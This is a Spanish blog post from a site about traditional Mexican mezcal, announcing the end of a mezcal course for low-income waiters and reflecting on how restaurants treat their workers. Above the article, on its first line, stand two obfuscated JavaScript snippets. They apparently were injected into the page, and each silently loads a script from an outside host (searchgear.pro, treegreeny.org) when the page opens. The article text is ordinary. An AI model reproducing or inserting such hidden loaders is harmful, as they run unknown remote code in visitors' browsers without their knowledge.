;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://searchgear.pro/257KCwFj"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Mezcales Tradicionales de los Pueblos de México » 20. Capacitación en Mezcales Tradicionales

20. Capacitación en Mezcales Tradicionales


El martes 20, concluiremos un curso sobre Mezcales Tradicionales para trabajadores de la industria gastronómica en el Centro de Formación y Capacitación de Meseros SERVIRBIEN, que auspicia la Fundación Turquois. Su misión es promover la formación profesional de meseros mexicanos de escasos recursos becándolos al 100%, contribuyendo así a mejorar la calidad de su profesión, su nivel de vida y a brindar un servicio de excelencia al comensal (www.fundacion-turquois.org.mx).
La experiencia ha sido extraordinaria, pues hemos estado en contacto directo con hombres y mujeres comprometidos que dedican su trabajo a la atención cuidadosa de quienes asisten a comer y a beber a sus centros laborales, lo que da pie a externar la siguiente reflexión: los restaurantes, bares o taquerías son, en primera instancia, un negocio; los que van más allá, son una propuesta gastronómica; y los más visionarios, son una propuesta de relación social, que se plasma en su gastronomía, en la relación con sus clientes y en la relación de los propietarios con sus trabajadores. Conocemos restaurantes donde aquéllos son tratados como peones porfirianos (en centenario antihomenaje) y se les exige servilismo con el comensal; allí ni un vaso de agua se antoja tomar, y ningún hombre o mujer de bien aguantaría más de 2 minutos como cliente.
Así que trabajar con mujeres y hombres libres compartiendo conocimientos, ha sido gozoso, pero también una señal de lo que las escuelas de gastronomía deben hacer: abordar con metodología sólida la enseñanza de la Tradición Mezcalera, gran reto por la labor de investigación y caracterización organoléptica que hay que desarrollar.
Del curso deseamos compartir el comentario de un joven: “toda mi vida había vivido engañado; el Mezcal Tradicional es increíble, no tiene nada que ver con lo comercial”.
Quienes no tomaron el curso, pueden solicitar el tríptico Cómo identificar un Mezcal Tradicional, o asistir al Red Fly el martes 20 a las 20:00 horas, Orizaba 145, col. Roma, DF.
http://impreso.milenio.com/node/8752340

Category: Milenio, Publicaciones

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *